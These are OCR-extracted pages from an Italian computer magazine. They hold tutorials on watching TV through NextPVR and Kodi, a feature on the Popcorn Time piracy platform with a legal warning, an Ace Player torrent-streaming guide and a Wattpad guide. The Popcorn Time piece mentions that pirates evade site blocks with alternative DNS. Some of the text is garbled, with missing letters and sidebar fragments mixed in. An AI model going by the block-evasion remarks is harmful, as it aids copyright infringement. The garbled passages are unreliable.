Siamo pronti ad installare nel nostro PC il sintonizzatore TV e il relativo software di controllo.
Completata questa fase, dovremo conigurarlo allinterno di NextPVR. Ecco come procedere.

Un nuovo dispositivo

Come prima cosa dobbiamo installare nel computer un


sintonizzatore digitale terrestre. Per questa operazione
facciamo riferimento al manuale del nostro dispositivo e al CD
con i driver che, molto probabilmente, includer una procedura
guidata per linstallazione.

Selezioniamolo in NextPVR

Avviamo NextPVR: sulla schermata blu che appare clicchiamo con il tasto destro del mouse e selezioniamo
Settings, quindi clicchiamo sul tab Device nella colonna destra.
Nella lista dovrebbe apparire il nostro sintonizzatore TV: selezioniamolo e clicchiamo il pulsante Device Setup.

Cerchiamo i canali

Si apre la inestra di conigurazione del sintonizzatore:


mettiamo un segno di spunta, se assente, sulla voce
Enabled. Quindi selezioniamo Italia nel menu a tendina Country e la nostra regione e provincia in quello sottostante, Region.
Clicchiamo Scan per avviare la ricerca di canali.

AGGIORNIAMO
I CODEC
Se la riproduzione dei
contenuti televisivi avviene a scatti, pu darsi
che il computer faccia
fatica a decodiicare il
lusso video. In questo
caso possiamo provare a
utilizzare dei codec pi
performanti di quelli
Microsoft. Installiamo
il pacchetto FFdshow
presente nella sezione
Audio&Video del Win
DVD-Rom, coniguriamolo per gestire i formati H.264 ed MPEG-2
tramite lapplicazione
Video decoder coniguration, quindi avviamo
NextPVR e in Settings/
Decoders/Video decoders scegliamo fdshow
Video Decoders.

Ecco la Tv in diretta

Quando appare la scritta Scan complete la ricerca dei


canali terminata: clicchiamo su OK, quindi ancora OK
nella inestra di conigurazione. Torniamo cos alla schermata
principale di NextPVR: cliccando Live TV dovrebbe partire la
visione del primo canale della lista. Chiudiamo NextPVR.

Sempre pronto
Dal menu Start clicchiamo sul percorso Tutti i programmi/NPVR/NPVR Start Services, poi sul pulsante SI quando ci appare la inestra di conferma, quindi OK: questo servir
ad avviare il server che passer i contenuti a Kodi. Dal prossimo
riavvio del PC partir in automatico.

BUONI
CONSIGLI

Nella barra di stato

Nella system tray di Windows una piccola icona nera


con una n bianca ci informa che il server di NextPVR
pronto a lavorare. Senza questo servizio attivo non sar possibile
vedere la TV da Kodi. Cliccando col tasto destro sullicona possiamo avviare NextPVR, arrestare o riavviare il server.
Speciali Win Magazine 61

Cos fa lhacker

| Fai da te | Tutta la TV dalletere al PC |

Accendiamo la TV con Kodi


Tutto pronto inalmente per guardare i nostri programmi televisivi preferiti sul media center: dobbiamo soltanto
metterlo in comunicazione con NextPVR. Bastano pochi clic per completare anche questa procedura.

Operazione Live TV

Avviamo Kodi, quindi andiamo nel menu


SISTEMA/Live TV e spuntiamo la voce
Abilitato, se non lo gi. Se appare una inestra
di avviso che nessun PVR abilitato diamo OK,
quindi spostiamoci su SISTEMA/Add-on/Add-on
disabilitati e clicchiamo NextPVR PVR Client.

BUONI
CONSIGLI
LO SPEGNIMENTO
AUTOMATICO
Capita spesso di addormentarsi guardando la
TV. Nessun problema:
non necessario lasciare il PC acceso tutta la
notte in quanto in Kodi
presente la funzionalit di timer per lo spegnimento automatico
(o sleep). Per impostare
un timer, clicchiamo sul
tasto Power-Of posizionato in basso a sinistra
nella home di Kodi.
Scegliamo la voce Timer
spegnimento personalizzato e impostiamo un
intervallo (in minuti),
quindi clicchiamo su
Fatto.

62 Win Magazine Speciali

Abilitiamo il PVR

Nella inestra che appare clicchiamo su


Abilita: ladd-on si collegher automaticamente a NextPVR e sincronizzer la lista canali e
le informazioni EPG. Possiamo chiudere la inestra
delladd-on cliccando la X in alto a destra e tornare
nel menu principale di Kodi.

Una nuova voce

Tra le voci del menu principale adesso


presente anche TV. Cliccandoci sopra si
accede alla lista canali creata da NextPVR e che
stata passata a Kodi nelloperazione precedente.
Basta cliccare su un canale per avviare la visione
e un doppio clic per riprodurlo a tutto schermo.

ANCHE LA TV SATELLITARE ACCESSIBILE


CON IL NOSTRO MEDIA CENTER
La procedura per aggiungere un sintonizzattore satellitare estremamente
simile a quella fattta per il
digitale terrestre: una
u volta installata la sch
heda e i
relativi driver nel PC, avviamo NextPVR e apriamo
a
gs come
la inestra Setting
al Passo 2 del Macropasso
B. Quindi, nel tab Devices
selezioniamo la vo
oce corrispondente alla nosstra scheda satellitare e cliccchiamo
Device Setup. Nel m
menu Samo quintellite A selezioniam
di il satellite verso il quale
puntata la nostra parabola (solitamente 13.0
Hotbird) e clicchiamo su Scan per avviare la ricerca dei canali. A operazione conclusa (teniamo
conto che potrebbe impiegare diverso tempo),
clicchiamo su OK e chiudiamo la inestra Settings.
Ora, su NextPVR dovremmo riuscire a vedere la
TV dai canali satellitari (e anche da quelli terrestri
se precedentemente avevamo aggiunto il sintonizzatore DVB-T). La procedura per conigurare
e riprodurre la TV satellitare su Kodi la stessa di
quella vista al precedente Macropasso C.

Cos fa lhacker

| Tutta la TV dalletere al PC | Fai da te |

KODI FUNZIONA ANCHE COME UN VIDEOREGISTRATORE


Tramite linterfaccia di Kodi possiamo anche registrare i nostri
programmi preferiti. Semplicemente andiamo su TV, quindi sul
sottomenu Timer e clicchiamo
Aggiungi timer. Non resta che

inserire il canale e lora di inizio


e ine. Possiamo anche registrare
senza programmare, premendo il
tasto di registrazione nella sezione In riproduzione della barra laterale (il primo da destra). Partir

immediatamente la registrazione
del canale che stiamo vedendo
per 120 minuti (questo parametro
pu essere cambiato in SISTEMA/
Live TV/Registrazione/Durata
della registrazione istantanea).

Per rivedere ci che abbiamo registrato aggiungiamo la cartella


di registrazione (labbiamo impostata al Passo 3 del Macropasso
A) come sorgente, cliccando su
Video/File/Aggiungi video.

Organizziamo i canali televisivi


Tra digitale terrestre e satellitare abbiamo adesso a disposizione centinaia di canali, ma scorrerli tutti praticamente
impossibile. Vediamo quindi come organizzarli in liste in base alle nostre necessit.

Nessuna sincronizzazione

Per poter personalizzare le liste di canali dobbiamo disabilitare la sincronizzazione con NextPVR, altrimenti ad ogni avvio quelle di
Kodi saranno sovrascritte. Avviamo Kodi, andiamo
in SISTEMA/Live TV e togliamo la spunta a Sincronizza gruppi di canali col/coi backend.

Ecco i gruppi

Adesso clicchiamo su Gestione canale, poi su Gestione gruppo. Qui troviamo,


sulla sinistra, lelenco dei gruppi disponibili (la prima volta che accediamo troviamo quelli importati
da NextPVR), mentre sulla destra la lista di tutti i
canali disponibili.

Clicchiamo su Aggiungi gruppo per creare una nostra lista di canali preferiti: inseriamo un nome per il gruppo e clicchiamo Fatto.
Adesso clicchiamo sul nome del gruppo, a sinistra. Nella colonna Canali non raggruppati vengono mostrati i canali non presenti nel nostro gruppo.

Selezioniamo il gruppo

Ora aggiungiamo i canali


Possiamo aggiungere i canali al nostro gruppo semplicemente cliccandoci sopra nellordine in cui vogliamo appaiano. Allo stesso modo, per
togliere un canale dal gruppo suficiente cliccarci
sopra. Possiamo creare quanti gruppi vogliamo e un
canale pu essere presente in pi gruppi.

I nostri canali preferiti

Torniamo al menu principale, quindi scegliamo la voce TV. Accediamo al pannello laterale delle opzioni premendo la freccia sinistra sulla tastiera e andiamo alla voce Opzioni vista. Qui
possiamo decidere quale gruppo di canali visualizzare, tra tutti, quelli di NextPVR e quelli creati da noi.

Accesso diretto

Dai sottomenu presenti nella sezione TV di


Kodi possiamo accedere alle informazioni
sulla programmazione, cliccando su EPG, anche se
NextPVR non sempre le gestisce correttamente, e
programmare la registrazione dei programmi (vedi
box in alto) cliccando su Timer.
Speciali Win Magazine 63

Cos fa lhacker

| Parliamo di | Popcorn Time |

TeleVisioni
da hacker
Ecco la piattaforma usata dai
pirati per vedere gratis serie
TV e ilm in prima visione

onoormaiinpochicolorochenonhanno
mai sentito parlare di Popcorn Time,
uno dei nuovi servizi di intrattenimento
che in questi ultimi mesi ha riscosso un enorme successo in Rete. Sviluppato nei primi
mesi del 2014, Popcorn Time stato rilasciato
in versione definitiva nel marzo dello stesso
anno da due programmatori argentini: il loro
obiettivo era quello di creare un nuovo ma
semplice modo per consentire agli utenti di
accedere con estrema facilit ai film e alle serie
TV di maggior gradimento, il tutto proprio
perch in Argentina la piattaforma di Netflix
non ne voleva sapere di essere lanciata. Il loro
codice era basato su Peerflix, uno strumento
che permetteva di visualizzare in streaming
i file torrent grazie al framework Node.js. Una
prima versione di Popcorn Time venne cos rilasciata su GitHub (sito in cui ogni sviluppatore
pu condividere i codici sorgenti dei propri
software) rendendola di fatto open source.

I problemi con le major


cinematografiche
Non pass molto tempo perch il software
si diffondesse a macchia dolio, al punto da
attirare lattenzione dei legali
g degli
g studi cinematografici holllywoodiani che non persero
tempo nel far preessione affinch il servizio

ATTENZION
Ricordiamo che riprodurre in sstreaming
contenuti video protetti da diritto d autore
illegale (leggi il box col parere dell av
vocato a pagina 67). Alcune procedure
mostrate nellarticolo non veng
gono
volutamente pubblicate in maniera
dettagliata per evitare che siano
messe in pratica.

| Popcorn Time | Parliamo di |

Cos fa lhacker

Una delle caratteristiche che ha contribuito alla difusione e al successo di Popcorn Time sicuramente linterfaccia molto chiara
e intuitiva del software di streaming video.
di streaming video (illegale) venisse chiuso
definitivamente. Non ci si poteva aspettare
una reazione diversa da ci che poi accadde:
i due sviluppatori argentini abbandonarono
e chiusero la piattaforma, non prima per di
aggiornare il codice sorgente di Popcorn Time
sul canale pubblico. Cos facendo, chiunque
avrebbe avuto la possibilit di continuare
lopera senza problemi.

La rinascita del servizio


Non passarono molti giorni che venne comunicato che Popcorn Time era tuttaltro

che morto e sepolto: un gruppo di sviluppatori, non noti, avevano deciso di prendere
in mano le redini del progetto e portarlo a
nuova vita. E cos fu. Nel frattempo nella scena
underground di Internet si leggeva di diversi
gruppi indipendenti intenti a realizzare una
propria versione del programma di streaming
che tanto clamore era riuscito a generare.
Allimprovviso per accadde ci che nessuno
sarebbe riuscito a prevedere: laccount su
GitHub, dove veniva costantemente aggiornato il codice sorgente di Popcorn, venne chiuso,
precludendo a migliaia di potenziali svilup-

POPCORN TIME
SU ANDROID E IOS
Come se non bastasse, oltre che su PC,
Popcorn Time stato rilasciato anche per
le piattaforme mobile Android e iOS. Per
il sistema operativo di Google non possibile trovarlo su Google Play, ma circola
in Rete un semplice APK da scaricare e
installare su smartphone e tablet. Per iOS
invece stato creato un apposito installer
che si occupa di installare il software su
iPhone e iPad senza che questi debbano
essere necessariamente sbloccati tramite
la procedura di jailbreak. Con iOS 9, non
ce ne sar bisogno, dal momento che si
potranno installare applicazioni anche
se queste non sono irmate digitalmente
da Apple.

Speciali Win Magazine 65

Cos fa lhacker

| Parliamo di | Popcorn Time |

I PIRATI USANO LA CHROMECAST PER...


Un servizio che vuole fare il verso a Netlix non
poteva lasciare a bocca asciutta chi vuole godersene i contenuti anche sul grande schermo.
Quale soluzione migliore se non quella di utilizzare il supporto al Chromecast di Google:
gli sviluppatori di Popcorn Time hanno infatti
inserito un piccolo tasto, nel player integrato,
che invier il video direttamente alla chiavetta
collegata al televisore. La qualit resta la stessa,
anche se tutto dipende dalla qualit della rete
Wi-Fi di casa che si occuper di smistare localmente tutto il traico. Il funzionamento tutto
sommato semplice: una volta scaricato il programma dal sito uiciale e averlo avviato, i pirati
si assicurano che Chromecast sia conigurata

per accedere alla rete del PC, quindi aprono il


catalogo dei ilm, anche in HD, scelgono quale
vedere, selezionano i sottotitoli e la qualit e
procedono con la visione del titolo! E se non
hanno la Chromecast? I pirati non si scoraggiano di fronte a questa evenienza. Lunica
condizione quella di avere un TV compatibile
con il protocollo DLNA e connesso alla rete di
casa tramite Wi-Fi o cavo Ethernet. Una volta
avviato Popcorn Time e scelto il ilm, selezionano la TV e iniziano a riprodurlo. In alternativa,
se questo metodo non funziona, installano sul
PC un server DLNA che comunica con la TV e
conigurano opportunamente Popcorn Time
per visualizzare i ilm attraverso il server.

patori di poter mettere le mani sul progetto


del secolo, capace di generare un fenomeno
mediatico degno di Napster. Ne nacque un
caso da non poco conto, in quanto rimasero
in Rete due versioni del software (ovvero quelli
che si erano maggiormente diffusi): il Popcorn
Time, derivato direttamente dalloriginario, e
Time4Popcorn. Entrambi ovviamente condividevano gran parte del codice originario, ma
questultimo ha fatto parecchio discutere per
la presenza di malware rilevati nelle ultime
versioni rilasciate agli utenti. Controversie
nacquero anche in seguito alla decisione
che doveva sancire quale dei due software
avrebbe avuto il dominio Web lasciato in
eredit; si concluse con lassegnazione del
sito popcorntime.io al ramo di sviluppo originario, mentre Time4popcorn si aggiudic
il dominio popcorn-time.se. Entrambi i programmi sono quindi molto simili, ma vengono
sviluppati da programmatori differenti, con
diversi obiettivi, rilasci in tempistiche diverse
e implementazione di novit e funzionalit in
maniera differente. Pare che Time4Popcorn,
oltre ai guai derivati dalla presenza di virus
che iniettava nei PC degli utenti, offra contenuti di qualit discutibile (come ad esempio
film ripresi nei cinema attraverso videocamere illegali) al contrario di Popcorn Time che
accontenta di pi gli utenti con contenuti di
ottima qualit, dallHD al FullHD passando
anche dal 3D. Non solo, questultimo ha riaperto la pagina ufficiale di GitHub rilasciando periodicamente e con costanza il codice
sorgente del software, cos da renderlo di fatto
completamentee open source con
nza; in pi
p c la
totale trasparen
possibilit di acccedere

POPCORN TIME: UNA STORIA NATA NEL 2014


o.
Vediamo quali sono state le tappe principali della storia del client BitTorrent per lo streaming video

Gennaio 2014

Giugno 2014

Gennaio 2015

Due sviluppatori
argentini hanno
lidea di sviluppare un
software pari a Netlix,
ma gratuito.

Chiude la prima
versione di Popcorn
Time, ma il suo
sorgente resta su
GitHub

Il numero dei utenti


che utilizzano
Popcorn Time subisce
un incremento del
336 %.

2014

Agosto 2015
2
Sono oltre 1220 mila
i like su Faceebook
e 32 le ling
gue a
disposizion
ne su
Popcorn TTime

2015

2016

Marzo 2014

Luglio 2014

Luglio 2015

Nasce e viene
rilasciato Popcorn
Time.

Nascono e si espandono
a macchia dolio i due
eredi: Popcorn Time e
Time4Popcorn

Vengono perseguiti
in Danimarca alcuni
utenti che avevano
messo in Rete guide su
Popcorn Time

66 Win Magazine Speciali

Settembre
2015
In Italia viene oscurato
il sito uiciale per
impedirne
il download

Cos fa lhacker

| Popcorn Time | Parliamo di |

agli streaming tramite una VPN integrata, in


modo tale da garantire il completo anonimato
agli utenti.

Ma cos davvero Popcorn Time?


Lo possiamo letteralmente definire il Netflix
dei pirati, perch ne eredita sia la natura,
sia linterfaccia ma soprattutto la qualit (e
la vastit) dei contenuti disponibili. Film,
serie TV e anime: migliaia di ore di video,
visualizzabili in streaming con la velocit che
contraddistingue i file torrent e una qualit
dellimmagine che vai dai 720p fino ai 1080p,
alcuni perfino in 3D. I pirati scaricano il programma dal sito, scelgono un film dal catalogo
con un clic, leggono la trama e si mettono belli
comodi a guardare il titolo che hanno scelto.
Tanto semplice quanto immediato. E la lingua? Ecco, essendo un progetto rilasciato su
scala mondiale hanno deciso, proprio come fa
Netflix, di rilasciare i contenuti prettamente
in lingua inglese, con la possibilit di scegliere
la lingua dei sottotitoli visualizzabili. Questi
peraltro sono facilmente importabili con un
clic (magari dopo averli scaricati da uno dei
tanti portali on-line) e condividibili in maniera
anonima con tutti quelli che visualizzeranno il contenuto nella stessa lingua. Ma come
pu un servizio totalmente illegale essere
tranquillamente usato e diffuso come fosse
un comune e leale concorrente di Netflix? Il
discorso che il protocollo torrent sul quale
si basa, essendo una tecnologia Peer to Peer,
non potr essere completamente fermato fin
quando ci sar almeno un computer (detto
seed) che condivide un contenuto disponibile
sulla piattaforma: Popcorn Time infatti non
si appoggia su server nei quali riversa il con-

Guido Scorza
uno dei
massimi esperti
in Diritto
delle Nuove
Tecnologie

ECCO PERCH
ILLEGALE USARE
POPCORNTIME
Qualcuno certamente si sentir fortunato nellaver scaricato Popcorn
Time prima che la Guardia di Finanza italiana ordinasse ai provider
italiani di non consentire pi agli
utenti di casa nostra di accedere

LA GDF CHIUDE POPCORN TIME IN ITALIA


Qualche settimana fa, per ordine della Procura della Repubblica di Genova, la Guardia di Finanza ha
chiesto ai provider italiani di inibire laccesso ai siti Web dai quali era possibile scaricare il software
Popcorn Time, in particolare i portali Popcorntime.io, Popcorn-time.se e Popcorntimeitalia.
com, divenuti pertanto irraggiungibili. Un duro colpo questo, almeno sulla carta, inferto ai pirati
dello streaming del nostro Paese anche se va detto che questo genere di blocchi, com noto,
facilmente aggirabile visto che il programma ospitato su numerosi siti mirror ed esistono dei
metodi illegali (ad esempio luso di DNS alternativi) che consentono di aggirare il problema.
Inoltre nulla praticamente cambia per quei pirati che hanno scaricato in passato lapplicazione e
la continuano a usare per vedere illecitamente contenuti protetti da diritto dautore. Essendo poi
Popcorn Time un programma open source, facilmente un pirata pu pubblicarne nuove versioni
(chiamatefork) e metterle in circolazione sul Web. LItalia non il primo paese a impedire luso di
Popcorn Time: gi due anni
fa lAlta Corte di Londra, nel
Regno Unito, aveva imposto ai provider britannici,
bloccare i siti che distribuivano il software, mentre in
Germania nel 2014 alcuni
utilizzatori del programma erano stati identiicati
e avevano ricevuto richieste
di danni per aver violato la
legge sul copyright.

tenuto della sua libreria, ma semplicemente


un player di file torrent condivisi da milioni di
utenti! Un po come Google, che ovviamente
legale, ma attraverso il quale i pirati riescono
a trovare fiumi di materiale illegale coperto
da copyright. Al massimo questo fenomeno di
diffusione pu essere arginato: infatti recentemente in Italia la procura di Genova ha disposto loscuramento del sito di Popcorn Time cos
da non consentire il download del programma;
ma neanche questa una soluzione, perch i

ai principali server che rendevano


disponibile il software in questione
e, allo stesso modo, si sentiranno
fortunati i tanti tecnologicamente
pi smaliziati che nonostante il
blocco riescono ancora ad accedere
ai server di PopcornTime. Ai primi
ed ai secondi, tuttavia, val la pena
di ricordare che avere dentro casa e
continuare ad usare uno strumento
il cui uso vietato dalla legge e del
quale stata bloccata la distribuzione non , esattamente un colpo
di fortuna, specie se lo strumento
in questione come nel caso di
PopcornTime serve ad eludere
misure tecniche di protezione a tutela della fruizione legale di ilm e

pirati la prima cosa che fanno quella di cambiare i DNS del proprio PC per poter accedere
nuovamente al sito. In Danimarca invece un
gruppo di undici giovani stato indagato per
aver creato un paio di blog in cui descrivevano
come utilizzare il programma di streaming in
guide passo passo molto dettagliate. Due di
questi sono stati arrestati. La soluzione per
combattere sconfiggere la pirateria? Rendere
le alternative legali largamente disponibili, i
prezzi contenuti e desiderabili.

serie TV, protetti da diritto dautore.


Basta leggere larticolo 174 ter della
Legge sul diritto dautore per averne
conferma: Chiunque abusivamente
utilizza.duplica, riproduce, in tutto o
in parte, con qualsiasi procedimento,
anche avvalendosi di strumenti atti
ad eludere le misure tecnologiche di
protezione, opere o materiali protetti,
oppure acquista o noleggia supporti
audiovisivi, fonograici, informatici o
multimediali non conformi alle prescrizioni della presente legge, ovvero
attrezzature, prodotti o componenti
atti ad eludere misure di protezione
tecnologiche e punitocon la sanzione amministrativa pecuniaria di
euro 154 e con le sanzioni accessorie

della confisca del materiale e della


pubblicazione del provvedimento su
un giornale quotidiano a difusione
nazionale.
Non serve essere avvocati, n fini
giuristi per capire che se si venisse
beccati a continuare ad utilizzare un
software come Popcorn Time per
godersi indisturbati ilm e serie TV a
sbafo (ad esempio utilizzando DNS
alternativi come quelli di Google o
OpenDNS), lapparente colpo di fortuna, rischierebbe di trasformarsi in
un autentico colpo di sfortuna e ci si
ritroverebbe a pagare una multa ben
pi salata del biglietto del cinema o
del noleggio del ilm su una qualsiasi
piattaforma online.

Speciali Win Magazine 67

Cos fa lhacker

| Software | Ace Player HD |

Scopriamo come uardare i video dalla rete torrent in tempo reale


senza avviarne il download sul nostro computer!

Film: guardali
senza scaricarli
I

nternet ormai il canale di distribuzione principale per musica e video:


tra iTunes, YouTube, Spotify e Vimeo
il PC ha sostituito televisione e impianto stereo. Ma a volte non cos semplice
trovare e riprodurre tutti i contenuti
multimediali disponibili. Capita infatti
che alcuni di questi non siano disponi-

bili direttamente in un formato fruibile


al volo e che ci sia bisogno di scaricare
il file sul computer prima di poterlo
eseguire. A questultima categoria appartengono i filmati da scaricare dalla
rete BitTorrent, probabilmente il pi
veloce protocollo di scambio file P2P
(Peer to Peer), ma che mal si presta alla

p aay
ayer
y delle meravi lie

fruizione del contenuto in tempo reale.


In questo caso possiamo per utilizzare
Ace Player HD, una speciale versione
di VLC che ci permette di vedere i
torrent direttamente dalla Rete senza
dovere attendere il completamento
del download. Scopriamo insieme
come fare.

Co eeg
eghiamoci
g
a Internet

Scompattiamo larchivio Acestream.zip (lo trovi sul DVD


allegato alla rivista) ed eseguiamo il ile che troviamo al
suo interno per avviare linstallazione guidata. Tra i componenti aggiuntivi da installare spuntiamo la voce Browser
Estensions e avviamo la procedura guidata con Install.

Al termine, clicchiamo Finish per testare il corretto funzionamento del software. Si aprir il browser e ci verr
chiesto di consentire ad ace_engine.exe il collegamento ad Internet: clicchiamo Consenti accesso. Con Firefox e Chrome clicchiamo Attiva per consentire il test.

Facciamo una piccola prova


Facc

Tutto funziona correttamente

Clicchiamo sul pulsante Go to test in basso nella pagina


del browser appena caricata per testare il corretto funzionamento del player. Verr quindi visualizzata la pagina Test web player. Clicchiamo Play e ci verranno poste alcune
semplici domande. Rispondiamo per proseguire.

Il player inizier a scaricare un ilmato desempio e a


riempire il buffer. Giusto qualche istante dopo, o poco
pi a seconda della connessione Internet di cui disponiamo, partir la riproduzione del video. Questo ci conferma che
linstallazione del software andata a buon ine.

68 Win Magazine Speciali

Cosa ci
occorre

10 MIN.
FACILE

PLAYER MULTIMEDIALE

ACE PLAYER HD
Lo trovi su: DVD
SOFTWARE COMPLETO
Sito Internet:
http://info.
acestream.org

BUONI
CONSIGLI
ATTENTI
ALLA BANDA
Anche se stiamo
guardando un ilmato
torrent in streaming la
dimensione del ile non
cambier: per vedere
bene il video dovremo
avere abbastanza
banda per scaricarlo in
tempo reale, cio il
tempo di download non
dovr superare la durata del video. Se durante
la riproduzione dovessero esserci frequenti
pause di rebufering o
rallentamenti, e ci non
fosse imputabile ad una
mancanza di sorgenti,
allora vuol dire che il
ile troppo grande per
la nostra connessione a
Internet. Per risolvere il
problema scegliamo un
torrent meno pesante,
ovvero un ilmato che
avr bisogno di una minore velocit di download al secondo.

Cos fa lhacker

| Ace Player HD | Software |

BUONI
CONSIGLI
BROWSER
CAPRICCIOSO

Inizia il divertimento

Troviamo il video

Avviamo adesso Ace Player dal menu Start/Tutti i programmi/Ace Stream Media di Windows. Ci troveremo
di fronte alla familiare interfaccia di VLC 2. Infatti questo
non altro che un fork del diffusissimo player open source di
VideoLan Project con laggiunta del supporto al torrent.

Avviamo il browser e carichiamo la pagina http://tears.


of.steel.torrent per scaricare il ile torrent di Tears of
Steel, un video open source prodotto dal Blender Institute. Possiamo usare ovviamente qualsiasi altro ile torrent contenente un ile video riconosciuto da Ace Player.

Se abbiamo installato
il plug-in e lestensione
per Firefox ma il player
integrato si blocca in
fase di caricamento
perch il componente
aggiuntivo non attivo.
Apriamo il pannello delle estensioni dal menu
Strumenti/Componenti
aggiuntive, spostiamoci
nella sezione Plugins
e attiviamo la voce
Sempre attivo per Ace
Stream P2P Multimedia
Plug-in. Quindi, riavviamo il browser.

CONTROLLIAMO
COSA FA ACE
PLAYER

e avviamo la riproduzione

Inte razione coi browser

Avviamo Ace Player, se non gi in esecuzione, e clicchiamo sul menu Media/Apri ile: nel box di dialogo
selezioniamo il ile torrent appena scaricato e clicchiamo
Apri. Dopo pochi secondi inizier la riproduzione di uno spot
pubblicitario e poi potremo goderci il nostro video!

Se abbiamo installato le estensioni per Firefox e Chrome


(Passo 2), Ace Player ci permette di guardare i torrent
direttamente dal Web come fossero video in streaming.
Basta cliccare col tasto destro su un torrent e poi su Play online torrent per richiamare il player integrato.

Guardiamo i torrent dal Web

Eliminiamo la pubblicit

Se poi il sito che rende disponibile il torrent supporta


direttamente Ace Player verr visualizzato un comodo
pulsante Play Online: baster cliccarci sopra per avviare automaticamente la riproduzione in tempo reale del video,
proprio come se fosse pubblicato su YouTube o Vimeo.

Ace Player propone spot pubblicitari prima del video o


dopo una pausa. Per eliminarli dobbiamo registrarci:
clicchiamo Disable ads, inseriamo la nostra e-mail,
spuntiamo I agree e clicchiamo Register. Inseriamo il codice
inviatoci via e-mail e seguiamo la procedura di registrazione!

Possiamo controllare in
tempo reale luso della
banda da parte di Ace
Player grazie allicona
di Ace Stream HD nella
system tray di Windows.
Posizioniamo la freccia
del mouse al di sopra
dellicona per far apparire il popup con tutte
le statistiche di utilizzo
del protocollo torrent.
Da qui possiamo controllare quanta banda
Ace sta utilizzando,
sia in download sia in
upload, e il numero di
sorgenti dal quale stiamo scaricando.

10

Speciali Win Magazine 69

Cos fa lhacker

| Libri gratuiti sul social network |

Ti sveliamo il canale se reto dove le ere senza limiti


e pubblicare le tue opere per condividerle con chiunque

Cosa ci
occorre

15 MIN.
FACILE

COMMUNITY
LETTERARIA

WATTPAD
Quanto costa: Gratuita
Sito Internet:
www.wattpad.com

social network
S

pessocisiritrovaaspegnereipropri sogni solo perch non si hanno i mezzi a disposizione per realizzarli. Quanti di noi hanno sperato
di poter un giorno pubblicare un proprio racconto e vederlo messo accanto ai grandi della letteratura moderna? Le porte sbattute in faccia nella
vita sono tante, ma di frequente Internet offre unopportunit a chi non
pu permettersela. Scordiamoci, dunque, editori lestofanti pronti a lucrare
sulle nostre abilit letterarie: nellera
del Web 2.0, infatti, diventare scrittori
di fama mondiale restando seduti comodamente a casa propria non poi
cos impossibile.

Ce n per tutti i gusti


Per fare ci basta avere una buona storia per le mani e iscriversi a Wattpad,
linnovativa community letteraria che
mette in comunicazione ogni giorno
milioni di autori in erba vogliosi di farsi leggere. Sono gi numerosi i casi di
scrittori che, grazie allapp in questione, hanno strappato contratti multimilionari a famose case editrici. Bisogna
dire, per, che non tutti hanno velleit artistiche e ci sono molti utenti che
pi che scrivere hanno solo voglia di
leggere qualche buon racconto, magari senza sborsare soldi. Tutto questo
possibile utilizzando sempre Wattpad,
che pu vantare pi di 100 milioni di

storie da leggere nel suo database e


oltre 40 milioni di Wattpadders (autori). Il sito davvero molto fornito e sovente capita di imbattersi anche in titoli ancora sotto la copertura del copyright e quindi illegalmente immessi sulla piattaforma. Wattpad multipiattaforma, quindi ci permetter di leggere
racconti a costo zero sia dal tablet sia
dal PC. I libri sono qualcosa di magico
e indubbiamente il cartaceo continua
a esercitare un certo fascino su molti
accaniti lettori, ma di certo non si pu
cestinare a priori la grande opportunit di poter divorare i nostri bestseller preferiti dal telefonino e in maniera totalmente gratuita. Buona lettura!

Registriamoci al servizio
Per usare tutte le funzionalit di Wattpad dobbiamo anzitutto eseguire una semplice
procedura di iscrizione completamente gratuita! Vediamo come farlo col nostro tablet.

Iscriversi con Facebook

Avviata lapp, clicchiamo Continua per essere reindirizzati su Facebook dove, cliccando OK, verremo reindirizzati ancora una volta allapp di Wattpad per scegliere tra
alcuni titoli quelli che corrispondono di pi ai nostri gusti. Inine ci verr chiesto di invitare al servizio nuovi amici tramite
Twitter, messaggio, e-mail o lo stesso Facebook.

70 Win Magazine Speciali

o con la propria e-mail

In alternativa possiamo compilare il form posto nella prima schermata dellapp. Una volta inseriti e-mail,
username e password, ci baster tappare sul pulsante Accedi e poi Iscriviti. Dovremo quindi entrare nella nostra mailbox
per confermare liscrizione, dopodich potremo cominciare a
pubblicare contenuti o a leggere gli scritti altrui.

TABLET ANDROID

ASUS
FONEPAD 7
Quanto costa: 149,00
Sito Internet:
www.asus.it

BUONI
CONSIGLI
LIBRI GRATIS
ANCHE SUL PC
Wattpad multipiattaforma e ben si adatta
alle esigenze di ogni
utente. Non sempre,
infatti, le persone
amano utilizzare le
piattaforme mobile.
C comunque chi
ancora legato al vecchio
computer: per questo
Wattpad disponibile
nella modalit desktop
che implementa tutte le
funzioni dellapp. Linterfaccia molto intuitiva: una volta loggati,
ci troviamo davanti la
schermata iniziale con
le storie e i Wattpadders consigliati. In
alto a sinistra grazie al
tasto Scopri potremo
dare unocchiata ai testi
presenti in Wattpad in
base alla loro categoria.
Cliccando Crea, invece,
potremo caricare il
nostro racconto, mentre con Community
potremo monitorare i
vari concorsi di scrittura
indetti nellapp.

Cos fa lhacker

| Libri gratuiti sul social network |

Leggiamo gratis col tablet


Ecco la guida pratica per usare al meglio lapp di Wattpad: potremo creare una biblioteca
personale, leggere i bestseller preferiti ovunque ci troviamo e condividere i libri con la community.

Personalizzare la schermata principale

Una volta loggati, ci ritroveremo nella schermata principale,


dove ci sono i libri di tendenza. Per indirizzare la schermata iniziale in base ai nostri gusti letterari tocchiamo il tasto Categorie e scegliamo quella desiderata. Per cercare un testo da leggere,
tappiamo sulla lente in alto a destra e digitiamo il nome del libro.

Cercare testi e condividerli

Con la barra di ricerca potremo ispezionare storie, persone ed


elenchi di lettura corrispondenti al nome digitato. Sul tablet
compariranno i vari testi con copertina e breve intro: trascinando a
sinistra il romanzo prescelto ci verr data lopportunit di salvare il
racconto nella nostra biblioteca o condividerlo tramite altri social.

BUONI
CONSIGLI
WATTPAD TIENE
IL SEGNO
Non preoccupiamoci di
tenere il segno in dove
siamo arrivati a leggere. Lapp, infatti, salver
in automatico lultima
pagina visualizzata per
ogni testo e, una volta
riaperto Wattpad, ci
baster semplicemente
cliccare sul libro prescelto per ritrovarci a leggere da dove avevamo
lasciato.

UNA COMMUNITY
ATTIVA
Wattpad anche molto
social. Il consiglio
quello di monitorare
sempre le attivit dei
nostri followers e dei
following. Tramite il
secondo tasto in basso,
partendo da destra,
potremo infatti controllare in qualunque
momento le attivit di
altri utenti e scambiarci
addirittura messaggi
privati con alcuni di
questi.

CARICHIAMO I
NOSTRI TESTI

Le ere semplicissimo

Toccando la copertina del racconto comparir la schermata principale del testo con varie informazioni, come la data
di pubblicazione, le parti in cui suddiviso il testo, le visualizzazioni, i voti positivi e i commenti. Poco sotto il titolo c il tasto Leggi:
baster toccarlo per cominciare il nostro viaggio nel racconto scelto.

Da un capitolo allaltro

